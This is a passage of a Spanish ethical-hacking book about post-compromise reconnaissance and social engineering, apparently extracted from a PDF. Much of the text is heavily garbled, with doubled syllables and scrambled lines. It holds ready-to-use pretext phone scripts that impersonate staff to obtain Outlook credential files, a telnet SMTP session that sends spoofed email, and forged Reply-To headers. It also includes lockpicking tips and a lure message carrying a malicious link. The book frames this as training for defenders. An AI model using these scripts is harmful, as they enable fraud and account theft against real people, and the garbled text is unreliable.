buscar buscar deter determi mina nado do tipo tipo de ser vicio,  vicio, vulne vulnera rabi bililida dades des existen existentes tes o posi posibles, bles, gene generar rar errores. errores. Direc Di rección ción IP: Tra  Tratar tar de ubicar ubicar a la red de la orga organi niza zación ción en Inter Internet net o algún algún obobje jeti ti vo  vo pde arti ticu cular lar den dentro troode tra redes redes inlaternas, ya sea admi adminis nistra trati ti va,  va, opera ope rati tien  va,par  va, pro produc ducción ción de un testrama testeo teomado endo cade caso so de queinter tunas,  viera.  vie ra. Un nombre nombre de host: sir ve para para tratar tratar de ubicar, ubicar, en un rango rango de IPs diná dinámi micas, cas, una deter de termi mina nada da termi terminal nal obje objeti ti vo,  vo, o ubi ubicar car un sector sector de la orga organi niza zación ción (recor (recordar dar las termi ter mina nales les o PC llama llamadas das Recep Recepción, ción, Geren Gerente, te, Note Notebook book o Conta Contadu duría). ría). Clase Cla se de anti anti virus:  virus:  Ali  Alinear near bina binarios rios por ejecu ejecutar tar para para que el motor motor de búsque búsqueda da

E-mails sin dirección IP

Entre los presta Entre prestado dores res de servi servicios cios de correo correo electró electróni nico, co, pode podemos mos encon encontrar trar dos que no de jan graba grabada da nuestra nuestra direc dirección ción IP en la cabe cabece cera ra de los e-mails envia enviados dos desde desde su pági pá gina. na. Ellos son: Gmail (www.gmail (www.gmail.com) .com) y Hushmail Hushmail (www.hush (www.hushmail mail.com). .com). También También poseen po seen otras inte intere resan santes tes funcio funciones nes de segu seguri ridad. dad.

84

 

no los detec detecte te o bien saber saber qué anti anti virus  virus desha deshabi bililitar tar momen momentá tánea neamen mente te o direc directa ta-mente men te inuti inutililizar zarlo. lo. Un códi código go fuente: fuente: De sitio sitio insti institu tucio cional, nal, de aplica aplicación, ción, e-mail, etcé etcéte tera. ra. Una versión versión de aplica aplicación: ción: Bús Búsque queda da de vulne vulnera rabi bililida dades des concre concretas. tas. Unas polí políti ticas cas o proce procedi dimien mientos tos inter internos: nos: Si éstas éstas poseen poseen deta detalles lles de la infraes infraes-tructu truc tura, ra, la orga organi niza zación ción se encuen encuentra tra en un gra ve proble problema ma porque porque muestran muestran adeademás el proce proceder der de ella. Gene General ralmen mente, te, se logra logra compro comprome metien tiendo do el esce escena nario rio perpersonal so nal de los encar encarga gados dos (audi (audito tores, res, consul consulto tores res u oficia oficiale les/ad s/admins mins de segu seguri ridad dad ininformá for mátitica). ca). Éstos Éstos suelen suelen en viar infor informa mación ción confi confiden dencial cial a casi casillas llas fuera fuera de la insinstititu tución ción (perso (persona nales) les) o bien alma almace cenar narlas las en unida unidades des portá portátitiles les o hosts, descen descentra tra-lilizán zándo dolas las de su lugar lugar de origen origen y segu seguri ridad. dad. La lista lista es tan vasta vasta (recor (recorde demos mos todos todos los datos datos que pode podemos mos obte obtener ner median mediante te el análi análisis sis de la cabe cabece cera ra del correo correo electró electróni nico) co) como como la minu minucio ciosi sidad dad de quienes quienes realilizan rea zan el chequeo, chequeo, reco recolec lectan tando do todo todo tipo tipo de infor informa mación ción rela relacio ciona nada. da.  Ahora  Aho ra bien, ¿cómo ¿cómo anali analiza zare remos mos la infor informa mación ción que vaya vayamos mos consi consiguien guiendo do duran duran-te esa emula emulación ción de ataque? ataque? Esto Esto es impo imposi sible ble de anti antici cipar, par, ya que los obje objetiti vos  vos son todos to dos dife diferen rentes tes y hay tantas tantas varian variantes tes o varia variables bles de esce escena narios rios (y sus compo componen nen-tes) que se nece necesi sita tarían rían varios varios tomos tomos sola solamen mente te para para dar una le ve idea. Las posi posibi bililida dades, des, ni más ni menos, menos, son todas todas las imagi imagina nables. bles. De cualquier cualquier forma, forma, se pueden pueden pre ver los fac facto tores res está estátiticos cos de los compo componen nentes tes que cono conoce cemos mos de ante antema mano. no. Cosas Cosas tales tales como como que, en caso caso de que se logre logre una cuenta cuen ta shell en un ser vi ser vidor dor Linux, Linux, lo prime primero ro que tene tenemos mos que re vi  visar sar son los .bash _his  _history tory, las sesio sesiones, nes, los proce procesos, sos, y todo todo aquel archi archi vo  vo que nos dé in infor for-mación ma ción sobre sobre la red, los usuarios usuarios (passwd) y el entor entorno no en gene general. ral. Lo reco recomen menda dable, ble, una vez compro comprome metitido do el obje objetiti vo  vo como como en este este caso, caso, es anali anali-zar sobre sobre la marcha, marcha, ver si gracias gracias a ello se puede puede lograr lograr más infor informa mación ción (en cancantitidad dad e impor importan tancia) cia) y tomar tomarse se el tiempo tiempo nece necesa sario rio para para lograr lograr inter interpre pretar tarla la y darle darle un correc correcto to uso para para conti continuar nuar las siguien siguientes tes etapas, etapas, si el fin así lo deman de manda. da. Un intru intruso, so, por ejemplo, ejemplo, deja dejará rá corrien corriendo do un snif sniffer fer ocul oculto to como como ds dsniff  niff  y vol ve verá al cabo cabo de unos días a ver qué infor in forma mación ción inte intere resan sante te captu capturó ró para para conti continuar nuar o replan re plantear tear su intru intrusión. sión. En cambio, cambio, un profe profesio sional nal ético ético debe deberá rá tomar tomar notas notas de totodas las vulne vulnera rabi bililida dades des y descui descuidos dos para para confec confeccio cionar nar un repor reporte te deta detalla llado. do. En sínte síntesis, sis, la infor informa mación ción pre via al chequeo chequeo y la obte obteni nida da duran durante te él, son vita vitales les y  muy rele rele van  vantes. tes.

85

 

www.securityfocus.com

SecurityFocus es actualmente propiedad de Symantec y aloja la famosa lista de seguridad Bugtraq, entre otras como Forensics, pentest, securitybasics, IDS, Linux, Microsoft, Vul Dev, etcétera. En este portal de la seguridad, podemos encontrar columnistas, notas de primer nivel  y herramientas de modo serio y actualizado.

www.sourceforge.net

Cuenta con casi dos millones de miembros y tiene alojados 3561 proyectos relacionados con seguridad informática. Es el sitio ideal para testear nuevas e innovadoras aplicaciones, tanto

para Windows como para Linux y otros sistemas operativos. Los proyectos están nucleados en 14 categorías, con tópicos como Networking, SysAdmin y Security entre los más interesantes. 86

 

3 > Ingeniería

social

Inge In geni nier ería ía so soci cial al li liga gada da a la se segu guri rida dad d de la in info form rmac ació ión. n. Ve Vere remo mos s su sus s mo modo dos, s, haci cia a qui uié éne nes s va diri rigi gid da y el im impa pac cto que lle lega ga a tene ner r en la orga gani niz zac aci ión ón. . Tamb mbié ién n cono noce cer rem emo os el mod odo o en el que se puede lidiar con este tipo de técn té cnic icas as y al algu guno nos s ca caso sos s re real ales es co con n ejemplos ejem plos deta detallad llados. os.

 

INTRODUCCIÓN A LA INGENIERÍA SOCIAL El hom hombr bree pa pade dece ce lo loss eng engañ años os de desd sdee ti tiem empos pos re remo moto tos. s. De Desd sdee lo loss an anti tiguo guoss mercaderes que vendían productos falsos, charlatanes de feria y hasta supuestos alquimistas que juraban convertir el plomo en oro. También hubo muchos con conocimientos de prestidigitación que se hacían pasar por magos para robar joyas; o regalos con sorpresa como el Caballo de Troya, hasta espías de ejército en la antigua China u otra poderosa potencia, que apelaban al engaño como recurso para conseguir aquello que buscaban. La ingeniería social es un método basado en engaño y persuasión, utilizado para obtener información significativa o lograr que la víctima realice un determinado acto ac to,, co como mo por ej ejem empl plo, o, ej ejec ecut utar ar un arch ar chiv ivo o qu quee le ll lleg egó ó po porr ee-ma mail il,, qu quee rel elev evee su co cont ntra rase seña ña po porr te telé léfo fono no cuando se la solicitan o, por último, que esta es ta pe pers rson onaa in inci cida da so sobr bree ot otra ra pa para ra enviar datos hacia un lugar determinado. La ingeniería social apunta a explotar el factor humano en la infraestructura de la organización (considerado por muchos la parte más débil del sistema) y es un méto mé todo do qu quee pu pued edee ll llev evar arse se a ca cabo bo a trav tr avés és de ca cana nale less te tecn cnol ológi ógico coss (i (immpersonal vía Internet o teléfono) o bien en persona, cara a cara, según la osadía de quien la comete o intente.  A con contin tinuaci uación, ón, vere veremos mos los caso casoss típicos de ingeniería social a través de un medio tecnológico:

Éste es el caballo de Troya Troya,, del año 2004. util ut iliz izad adoo en la pe pelí lícu cula la Troya Gracias a este episodio histórico de guerra, se le dio el nombre de troyanos a todos los archivos supuestamente inofensivos que, al  ser ejecutados por el usuario, dejan una puerta para para el intruso en nuestra PC o Regalo.

 A. El utilizado por algunos worms msn (como (c omo por ej ejemp emplo lo W3 W32. 2.Pos Posse se): ): par paraa logra log rarr que nos nosotr otros os hag hagam amos os cli click ck en determinado link que nos envía a través de un mensaje instantáneo, generado de forma automática. Con este fin, intenta hacernos creer que son fotos de amigos y as asíí lo logr graa in infe fect ctar arno nos, s, en entr tree ot otra rass acciones. B. Los conocidos casos de phishing en

88

 

los que llega un supuesto e-mail de nuestro banco para que coloquemos nuestros datos personales o login en determinado formulario online. De esa manera, el delincuente los graba para finalmente extraer dinero de nuestra cuenta o vender los datos al mejor postor. C. Las famosas postales electrónicas de invitación, saludos o amor enviadas por email que, al abrirlas, nos requieren que coloquemos co loquemos nuevamente el login de nuestro correo electrónico, para ser grabado por el intruso y asi poder acceder a nuestra cuenta. Éstas se envían mediante los llamados lanzadores, desde sitios como  www.hackphreik.com o www.hackearhotmail.com, que no tienen nada que ver ver con la seguridad informática como allí dicen. Por eso, si vemos una tarjeta postal electrónica de ese estilo, no debemos dudar en ignorarla y borrarla.

Este correo nos invita a descargar la aplicación Gtalk, pero en realidad es un link a un falso portal Gmail en el que se nos pedirá nuevamente nuestra contraseña y usuario para que el intruso los obtenga fácilmente. Gtalk.

D. Del tipo trampa, como por ejemplo que nos dejen en nuestra oficina un CD con Libr Li bro o rec eco ome mend nda ado

Existe un libro especializado en el modo de engañar: The art of deception. Sus autores son Kevin Mitnick y William Simon. Es recomendable leer, en especial, el capítulo de las anécdotas y las recomendaciones de políticas para asegurar la información. Hay una síntesis en www.microsiervos.com/archivo/libros/the-art-of-deception.h www.microsiervos.com/archivo/libros/the-art-of-deception.html. tml.

89

 

programas ejecutables infectados, haciéndolos pasar como inocentes. Por otro lado, que nos hagan llegar un link que, a través de un sitio con XSS (cross site scripting), al dar clic en él nos robe la cookie de sesión que está en nuestra PC para luego hacernos un robo de sesión. Esta técnica (que detallaremos más adelante) es utilizada para entrar a nuestra cuenta de webmail sin conocer la clave. E. Casos relacionados con servicios de hosting (páginas webs): engaño al administrador del hosting en el que el intruso pide que se le dé un espacio para probar o comprar el servicio donde luego sube un script-shell en PHP o ASP y, acto seguido, puede ver los códigos fuente de otras páginas en ese mismo servidor o proveedor, mapear su red interna e intentar otras cosas. Otro caso común es el de hacerse pasar por el dueño del sitio para que haga el favor de reemplazar el email de registro y reenviar la clave ftp o del panel de administración a esa cuenta. Ese tipo de intenciones engañosas e inducción se conoce en la seguridad de la información como ingeniería social y puede estar dirigida hacia cualquiera de los empleados de una organización, ya sea desde la primera recepcionista hasta el gerente general o alguno de los agentes relacionados. Ahora veamos las formas típicas que adopta y las características de este tipo de engaño. El trabajo de ingeniería social puede estar dirigido a: • Una organi organizac zación ión objeti objetivo. vo. • Una o orga rganiz nizaci ación ón al azar. azar.

• • • •

Determina Determ inado do emple empleado ado.. Un grupo grupo de empl emplead eados. os. Un us usua uari rio. o. Todo aquel aquel relac relacionado ionado con éstos. éstos.

El contacto realizado es hecho supuestamente por: • Presta Prestador/ dor/aa de servic servicios ios.. • Conocid Conocido, o, amigo amigo o parien pariente te de algui alguien. en. • Au Auto tori rida dad. d.

Para Pa rano noia ia im impr prod oduc ucti tiva va ay quienes sugieren comportarse de modo paranoide para estar a salvo, pero eso no es bueno. Debemos ser ser algo desconfiados y acatar las normas, normas, pero no ser delirantes. Quien esté tan dedicado a pensar en un enemigo fantasma, pondrá en riesgo el escenario y hará perder la dinámica del sistema con medidas innecesarias y extremas.

H

90

 

otro sector sector o sucurs sucursal. al. • Colega de otro • An Anón óniimo mo.. • Imp Imperso ersonal naliza izado. do.

4.0, hay una escena de ingeniería En Duro de matar 4.0, social (minuto 57) llevada a cabo para robar un auto. Luego de activar los airbargs a golpes para que la central del sistema OnStar se comunicara, Justin Movie.

Long, interpretando a un hacker, convence a la operadora de encender el auto con la excusa de ir a un hospital luego de colisionar. En www.onstar.com/us_spanish/   jsp/explore/onstar_basics/technology.jsp,, encontramos el funcionamiento del sistema.  jsp/explore/onstar_basics/technology.jsp

En modo: • Casual. • Directo: consulta inocente y típica, haciendo firmar entrega de regalo, encuesta, completar planillas, etcétera. • Indire Indirecto: cto: involucrand involucrando o terceros ficticios ficticios o reales sin su conocimiento. conocimiento. • Trampa directa e indirecta: envío de correo con material en CD, suplantación suplantación de pendrive, etcétera. • Invas Invasivo: ivo: acceso acceso a recintos, recintos, irrupción irrupción dentro de oficina con con o sin utilización utilización de lockpicking, instalación de hardware espía (recolector o transmisor de datos).

Envi En viar ar e-ma e-mail ils s sp spoo oofe fead ados os Si deseamos probar el envío envío de e-mails con remitentes falsos en Windows, debemos instalar un servidor SMTP para la PC (www.softstack.com/download/freesmtp.zip) y crear una cuenta en Outlook en la que la configuración de servidor smtp será localhost (en caso de llegar al límite de diez envíos por día, podemos cambiar la fecha).

91

 

Lockpicking, es el arte de abrir cerraduras sin llave y sin romperlas. En la próxima figura, podemos ver dos cerraduras típicas, muy comunes en recintos ejecutivos donde se guardan backups en medios ópticos (respaldos de información en CD o DVD) o legajos de papel en carpeta.

Opened. Aqui les muestro como abrí manualmente dos cerraduras muy comunes. La primera

cerradura es de 4 pins, muy usada en armarios para ficheros, y la segunda es de 3 pins, típica de cajoneras.

Para abrirlas, se puede utilizar un alambre acerado del interior de una escobilla limpiaparabrisas como elemento de tensión, y como ganzúa una hoja de sierra moldeada con amoladora. Se pueden ver más detalles acerca de esta técnica (e interesante hobby) en  www.lockpickingsport.com o  www.lockpicking.es.

cerraduras. Variedad. Diferentes tipos de picks o ganzúas utilizadas para abrir cerraduras. 92

 

 A través de los medios: • Cara a cara con protagonista: Mediante diálogo. • De carácter secundario: Como empleado de correo o cadetería. • E-mail:  Todas las formas f ormas imaginables, algunas detalladas más adelante. E-mail: Todas •  Teléfono, impersonal: Diálogo.

• Fax: Enviando documentos con requerimientos de modificación de datos (caso  www.nic.ar, hostings) o con información sensible. sen sible. • Medios y agentes combinados: por ejemplo, el intruso envía un e-mail de un supuesto superior de una sucursal, avisando a la recepcionista de otra sucursal que en unos momentos va a pasar alguien a recoger un dato o determinada información para que se la tenga preparada. Fin del acto: • Info Inform rmac ació ión: n: busca pequeñas pistas o datos para planificar el embate. • Ac Acci cion ones es:: busca generar determinadas acciones.

Ingeniería social +information gathering  Aún sin el suficiente conocimiento técnico como para cometer una intrusión a través de la seguridad de red (firewalls, IDS, control de accesos), un manipulador hábil puede lograr su ingreso recabando información mediante algunas llamadas telefónicas o e-mails. ¿Cómo? Obteniendo los datos de un usuario legítimo a través de una previa recolección de información interna sobre procedimientos, datos concretos (tipos de formularios o códigos) y nombres. El intruso informático seguramente va a buscar información utilizando ingeniería social y por eso es tan importante, tanto para una organización como para nosotros -usuarios de internet-, tratar de no dar información confidencial o personal a extraños. Y ante algún suceso inesperado (como recibir una consulta de un desconocido o haber encontrado un pendrive en su escritorio), deberíamos desconfiar. ¿Qué hace tan riesgoso al embate de un ingeniero social? 93

 

• Éste adopta adopta la identi identidad dad que desea desea o la suplant suplanta. a. • Ajusta la retórica retórica o su modo de comunicarse al receptor, a sus sentimientos y a su rol dentro de la organización formal. • Gener Generaa la trama trama o excusa que que conviene conviene a su propósito. propósito.

• Hace interact interactuar uar personajes personajes reales reales y ficticios ficticios entre entre sí. • Expone a su víctima a trampas, voluntades voluntades de ayuda, seducción y preocupación preocupación con tal de obtener cierto dato o una acción precisa (o desencadenamiento de actos).

En su sitio web, CCC enseña como extraer una huella digital de un tercero para utilizarla en mecanismos biométricos de autentificación y de esa manera suplantar una identidad. Caos.

Hoy en día, con la actual expansión de Internet, el intruso que desea hacer ingeniería social cuenta con muchos recursos. Hay fuentes casi públicas de información ejecutiva en los círculos sociales o de contactos profesionales como Lynkedin, en el cual alguien puede publicar un currículum vítae muy interesante a nombre de cualquiera y, desde allí, ponerse a contactar con gente cercana a la organización objetivo o componentes de ésta.

94

 

Una red social como Linkedin (www.linkedin.com ( www.linkedin.com)) es útil para hacer ingeniería social ya que muestra los contactos de una persona, aunque ¿cómo sabremos efectivamente que el perfil que vemos allí pertenece realmente a la persona? Relaciones.

Ejemplos  A continuación, veremos algunos ejemplos sobre cómo utilizar las técnicas que conocimos hasta aquí. Éstas son formas en las que un intruso podría llevar a cabo su embate para obtener información de nuestra empresa y como profesionales de la seguridad, debemos conocerlas a fondo para intentar evitarlas.  Anécdota

Una consultora hizo un chequeo de seguridad de una organización con hincapié en ingeniería social. Para eso, los profesionales dejaron olvidados 20 pendrives con archivos que, al ser ejecutados, enviaban información de la organizacion hasta sus máquinas. La trampa fue efectiva con 15 empleados de la organización.

95

 

Ingeniería social vía teléfono En estos días, el teléfono es un medio que permite la suplantación de identidad (por quien está del otro lado) y es muy utilizado por quien practica ingeniería social.  Veamos un ejemplo de cómo puede ser utilizado. El ingeniero social llama a una sucursal (previa tarea de haber buscado un número en la guía telefónica, la industrial, internet o mediante el aporte de otro empleado u otro recurso de datos) de la empresa objetivo y dice algo como:  –Buenos días, lo llamo desde casa matriz, soy Juan Pérez del departam departamento ento de calidad, y me gustaría hablar con el encargado de producción. ¿Con quién tengo el gusto de hablar? Ése es, nombres, quizás, el comenzando primer approach inicio en de caso la ofensiva) para recabar comenza ndo por el (acercamiento, de una recepcionista de que no se conociera nadie allí dentro.  –¿Sería tan amable de recordarme recordarme el correo electrónico del gerente de producción? producción? Debo enviarle esta tarde un informe de calidad, es importante. No llegamos a tiempo para llevárselo y lo está esperando, es medio urgente. Éste es el factor que pretende generar ayuda en el otro, no sólo para recabar datos. Lo está esperando es un disparador de conciencia, algo que le hará creer a la secretaria si noAdemás ayuda, muy posiblemente tenga una atencióncómo por no haberloque, hecho. de recabar información por llamada teléfono,deveamos pueden ser los e-mails para continuar este caso.  –Mil gracias, Agustina, te enviaré copia por si me viene devuelto. ¿Lo hago a [email protected]?

Ejemplo conocido Uno de los casos de ingeniería social más conocidos mediante spam es el fraude del nigeriano. Podemos encontrar un interesante relato acerca de este engaño en www.elpais.com/articulo/portada/fraude/nigeriano/elpeputeccib/20061123elpcibpor_3 /Tes.

96

 

Con esta frase, inicia confianza y cae agradable, y muy posiblemente la persona le dé el e-mail personal institucional. Acto seguido, el ingeniero social deja pasar un par de días y escribe al e-mail del gerente de producción: Estimado Sr. García: le escribo para solicitarle el último informe sobre producción. Si esiréposible, ¿sería tanesta amable dejárselo aDesde Agustina?  Yo personalmente tardede a buscarlo. ya, muchas gracias. Atte.  Juan Pérez Dto. Calidad Casa Matriz Resto de la firma con direcciones y teléfonos. Imaginemos que este correo lo recibe un gerente de producción, supuestamente contactado por un nuevo agente de calidad que quiere conocer su trabajo y es de la casa matriz (principal) de la empresa. Mientras espera una respuesta por parte del gerente (quien al ver que nombra a la recepcionista con naturalidad tendrá mas confianza en el texto, que será más convincente si figuran estas piezas), de ser ésta positiva o al menos dudosa, este ingeniero social llamará de nuevo a Agustina solicitándole el informe faxeado o reenviado a su e-mail, ya que es muy probable que no vaya en persona y se las ingenie para conseguirlo de modo impersonal o a través de un tercero. El modo de abordar el caso podría ser más sutil aún. Las situaciones son numerosas por la cantidad de posibles variantes y personalidades involucradas. Es importante planificar una política interna acerca de los canales de comunicación comunicació n que contemple la descentralización de información institucional, su modo de envío cifrado y sus responsables. Otro de los casos más típicos es el llamado del empleado al usuario común de la empresa.  –Hola Agustina. Te llamo de Sistemas, soy Diego Pérez. ¿Podrías ayudarme un segundo? Estamos mejorando el tema del correo electrónico en la empresa y tengo que generar un archivo de tu cliente de correo. Son dos pasos solamente. ¿Estás con la máquina encendida?  –Eh. Hola, sí.  –Abrí Outlook por favor, andá a Herramientas, luego a Cuentas... No hace falta mucho guión para hacerle exportar a una secretaria sin muchos conocimientos de PC el archivo .iaf  de su cuenta y hacer que lo envíe para revisarlo. Este archivo posee toda la configuración de la cuenta de e-mail de

Outlook, incluso password, servidor SMTP y POP3, etcétera.  También  Tambi én debemos tener en cuenta que desde teléfonos celulares celulares se pueden llevar a cabo variadas acciones relacionadas con ingeniería social, como enviar páginas mediante mensajes de texto, e-mails, llamadas o conectarse a mensajeros 97

 

instantáneos.

En la actualidad, el voice morphing (deformación de voz) a través de software permite suplantar identidades gracias a la complejidad que poseen Audio.

este tipo de aplicaciones. Por ejemplo, un señor puede lograr la voz de una señorita.

Ingeniería social vía fax Muchos dominios han sido usurpados mediante fax. Hace tiempo, esto les pasó a los creadores de una conocida E-zine española, como a otros tantos aquí gracias a Photoshop y un escaneo de documento de identidad, faxeado con una simple nota. Un muy buen artículo sobre el tema se encuentra en www.bufetalmeida.com/133/ usurpacion-de-dominios-y-derecho-penal.html (sitio de abogados españoles con

Celulares comprometidos Se denomina Hacking Bluetooth a lo que que sucede cuando la agenda de contactos contactos del celular es comprometida. Ésta suele brindar muchos datos para realizar ingeniería social de alta credibilidad. cr edibilidad. Si nuestro celular tiene este servicio, conviene deshabilitarlo www.security-hacks.com/2007/05/25/essential-bluetooth-hacking-tools.

98

 

mucha experiencia en casos de intrusión y delitos informáticos). El engaño consiste, simplemente, en hacer un reclamo mediante fax a la institución que maneja el dominio a nombre del actual y real propietario solicitándole algún cambio de dato de registro u otro dato que permita luego utilizarlo para redireccionarlo hacia cualquier IP de Internet. En la página de preguntas frecuentes de Nic.ar (www.nic.ar/faq3.html), podemos  ver el modelo de nota (formato) que detallan para el fax. Así, un simple fax puede dejar a una organización sin su plataforma de comunicación y marketing online o bien, puede utilizarse para otros delitos informáticos que no vamos a detallar en este libro. En este caso, el ingeniero social se expone a falsificación de documento público (lo cual está penado) y a otras cosas, y depende de la organización que esté detrás del dominio en cuestión y de la reacción de ésta en caso de ser víctima.

Ingeniería social vía mensajeros instantáneos El mensajero instantáneo es un medio con mucha llegada al usuario común, aunque en épocas anteriores no había tanta gente conectada como sucede ahora con MSN Live. Suplantar la identidad en MSN es relativamente fácil y los mensajes pueden utilizarse de diversas formas: • Se le puede invent inventar ar alguna alguna historia historia.. •• Se pue de enviar envi archivos archivos directamente. mente. Se puede puede pasaar pasar r un link dedirecta página (ésta puede tener (ésta tener archivos infectad infectados os o links hacia archivos ejecutables, o algo que le saque determinada cookie o una imagen que deja el log de la dirección IP de la víctima). Para hacerlo, se agrega la persona a la lista de contactos y se le envía el mensaje con el link en estilo informal como:

“Hola capo, estoy desde la cuenta de mi prima, te paso la página que te conté, estoy  llegando de viaje mañana a casa. Saludos http://www.sitiomalicioso.com”

Ingeniería social según microsoft Si queremos conocer la explicación de Microsoft sobre lo que significa la ingeniería social, podemos visitar www.microsoft.com/Spain/athome/security/email/ socialengineering.mspx. En esa página encontraremos las recomendaciones y las soluciones de la empresa.

99

 

Ingeniería social vía e-mail El e-mail es el principal canal de ingeniería social en estos días. Lo utilizan los estafa est afador dores, es, los los spamme spammers, rs, los los intrus intrusos os y los gusan gusanos os (pro (program gramas as que, que, al ser ser ejecutados por el usuario o habiendo ingresado en nuestro sistema por algún servicio vulnerable, infectan la máquina para luego enviar un e- mail a todos los miembros de nuestra lista de contactos. Por ejemplo, VBS/LoveLetter worm). Recordemos que el e-mail permite suplantación de la identidad (el que dice que es anónimo, no conoce los medios de intercepción y rastreo). El e-mail posee tres particularidades interesantes para combinar con la ingeniería social: • Se puede puede falsear falsear el remite remitente nte (sender (sender o quien quien lo envía). envía). Veamo Veamoss un ejemplo ejemplo de cómo enviar un e-mail con remitente inventado: shell>telnet IP 25 // conecta al servidor smtp mediante telnet Trying IP, 25 ... Open 220 22 0 sm smtp tpx. x.xx xxxx xxxx xx.c .com om.a .ar r ES ESMT MTP/ P// / co cone nect cta a al sm smtp tp helo PC4// saludamos con e so so, PC4 es nuestro nombre de host 250 25 0 smt smtpx px.xx .xxxxx xxxx.c x.com. om.ar ar  mail from: test@domin test@dominioqueseno ioquesenosocurra.c socurra.com.ar// om.ar// Quien envía 250 ok

rcpt rc pt to to: : nu nues estr trom omai ail@ l@xx xxx. x.co com/ m// / Qu Quie ien n re reci cibe be 250 ok data // An Anunciamos cuerpo del mensaje 354 go ahead     X-Mai XMailer ler: : am amano ano v2. v2.0 0  Message-ID: essage-ID: 34235

Historia del correo electrónico

www.telecable. www.telec able.es/per es/personale sonales/carlo s/carlosmg1/h smg1/histori istoria_corre a_correo.ht o.htm m es un sitio donde donde podemos encontrar la historia del correo electrónico en español. Entre otras cosas, la página cuenta cómo los usuarios de sistemas dejaron de pasarse archivos con texto hacia carpetas para luego enviarse mensajes entre máquinas con este nuevo estándar.

100

 

to: nue nuestr stroma omail@ il@xxx xxx.co .com  m   from: from : test test@dom @dominio inioques quesenos enosocur ocurra.c ra.com.a om.ar r Sub Su bje jec ct: Tes est tea ean ndo env nvi io de ma mai ils a man ano o. Hola, esto es una prueba via telnet.// Mensaje.// Escribimos un punto y damos enter para terminar. 250 25 0 ok 2897 973 362 6235 354 443 qp 23 234 438 3864 64 quit 221 smt smtpx. px.xxx xxxxxx xxx.co .com.a m.ar r [Connection to IP closed by foreign host] // Se desconecta ...

 Así se vería el código fuente del mensaje que nos llegó: Rece Re ceiv ived ed: : fr from om sm smtp tpx. x.xx xxxx xx.c .com om.a .ar r (s (smt mtpx px.x .xxx xxx. x.co com. m.ar ar) ) by IP IP-p -pop op3 3 (7 (7.9 .9.3 .3/7 /7.9 .9.3 .3) )  with SMTP id MAA12494 for < nuestroma [email protected] [email protected] m >; Tue, 8 Jan 2007 00: 0:0 00: 0:0 00 +090 900 0 (K (KS ST) Received: (qmail 2243 invoked from network); 8 Jan 2007 00:00:00 -0000 Received: from unknown (HELO PC4 ) (IP desde donde se ejecutó el cliente

telnet) by by sm smtpx.xxxx.com.ar with SMTP; 8 Jan 20 2007 00:00:00 - 0000  Message-ID: essage-ID:    From Fr om: : < te test st@d @dom omin inio ioqu ques esen enos osoc ocur urra ra.c .com om.a .ar r >    To: < [email protected] >    Sub Su bje jec ct: Tes est tea ean ndo env nvi io de ma mai ils a man ano o. X-Mail X-M ailer: er: ama amano no v2. v2.0 0 Sub Su bje jec ct: Tes est tea ean ndo env nvi io de ma mai ils a man ano o. ...

• Se puede confeccionar en html. Esto Esto lo hace menos visible a los links maliciosos o, hacia cosas maliciosas.

US-CERT aconseja En el sitio http://www.us-cert.gov/cas/tips/ST04-014.html podrán encontrar (en inglés) consejos de como prevenir ataques de ingenieria social y phishing. Por Mindi McDowell

101

 

Un link en html hace menos visible un URL malicioso y por eso es fundamental  no ingresar (o hacerlo con mucho cuidado) en páginas que llegan a nuestro correo.

Outlook.

• Se puede declarar declarar hacia qué casilla será enviada la respuesta del e-mail original: From Fr om: : “Rem “Remit iten ente te re real al fa fals lsif ific icad ado” o” xx xxxx xx@g @gma mail il.c .com om // // Em Emis isor or fa fals lso o Repl Re plyy-To To: : xx xxxx xx@h @hot otma mail il.c .com om // Ca Casi sill lla a de in intr trus uso o To: To : in info fo@d @dom omin inio iovi vict ctim ima. a.co com m // Ca Casi sill lla a vi vict ctim ima a

En este de caso, que sucede es yque el intruso le envía un e-mail a lajamás víctima nombre un lo conocido de ésta desde su respectiva casilla, pero que salióa desde ella porque es un e-mail falso. Si no presta atención, esta víctima cuando

 Whitelist

Es un listado de casillas de e-mail de confianza. Un modo de aplicación sería que con el correo interno, los empleados pudieran comunicarse entre sí, pero al hacerlo hacia fuera (Internet), sólo se lograra a través de una whitelist en la que figurarían clientes, proveedores, sucursales y casillas de confianza. Lo no incluido en la lista sería descartado.

102

 

responda lo estará haciendo hacia la casilla del intruso. Más allá de estas características propias del e-mail, su contenido juega un papel importante, ya que se pueden enviar en viar links, archivos, historias inventadas y engaños de todo tipo. Así, es posible conseguir datos muy variados (por ejemplo, la planilla de las 100 preguntas para amigos con su color preferido, película favorita, etcétera), acceder a mensajeros, listas de contactos y mucho más.

No Tech Hacking es una guía de ingeniería social, dumpster diving (trashing) y shoulder surfing (mirar claves por sobre los hombros) escrita por Johnny Long y publicada por Syngress. Libro.

MEDIDAS CONTRA EL ENGAÑO En las organizaciones serias que utilizan recursos y recaudos en cuanto a seguridad de la información, la ingeniería social es tomada como una potencial

Recursos relacionados con la ingeniería social Ética de los negocios: www.eseade.edu.ar/servicios/Libertas/11_5_Machan.pdf. Acerca de la persuasión: www.cepvi.com/articulos/persuasion.shtml. Influir sobre las personas: http://encontrandoelexito.com/Ebooks/como_ganar_amigos_influir_sobre_las_ personas.pdf. El paralenguaje: www.google.com/search?hl=es&q=paralenguaje.

103

 

amenaza a su activo: la información.  A través del hacking ético, un profesional de seguridad intentará emular en la organización estos ataques -como supimos al principio- a fin de lograr lo mismo que podría alcanzar esta vez un ingeniero social o intruso (ya sea un empleado descontento o ex empleado, hacker, espía industrial, competencia). El propósito de esto es descubrir cuáles son los errores que se cometen en el trato con las personas en cuanto a divulgación de información supuestamente inofensiva y agentes externos a través de los medios de comunicación o en persona, es decir, desde el momento en que se la recibe en la empresa. Veamos ahora algunas medidas para

mejorar este aspecto. Se entrena a la gente mediante charlas (especialmente a las recepcionistas que trabajan en mesa de entrada, a las telefonistas, al personal de seguridad, a las secretarias y a los ejecutivos) acerca de esta fuga de información. También se desarrollan políticas para el manejo interno de la información, su clasificación y la no descentralización de ésta por fuera del protocolo. Se llevan a cabo testeos éticos de seguridad (que no tendrán impacto en la organización, sino que darán una noción de cómo está resguardada ante este tipo de amenaza) como el que detallamos anteriormente, se realizarán pruebas como la de los pendrives-trampa y otros métodos más intrusivos. La finalidad de todo esto es que sirven tambien para mejorar el nivel de seguridad relacionado a accesos físicos. En síntesis, los integrantes de todo el sistema deberían contar con estos elementos: • Concientiza Concientización ción institucion institucional al acerca acerca de la ingeni ingeniería ería social. social. • Políticas internas que contemplen la descentralización de datos y el el resguardo de la información. • Políticas acerca del buen uso de recursos de comunicación e informáticos, por parte de todos los empleados. • Lu Luci cide dezz ment mental al.. De no ser así, es muy probable que el 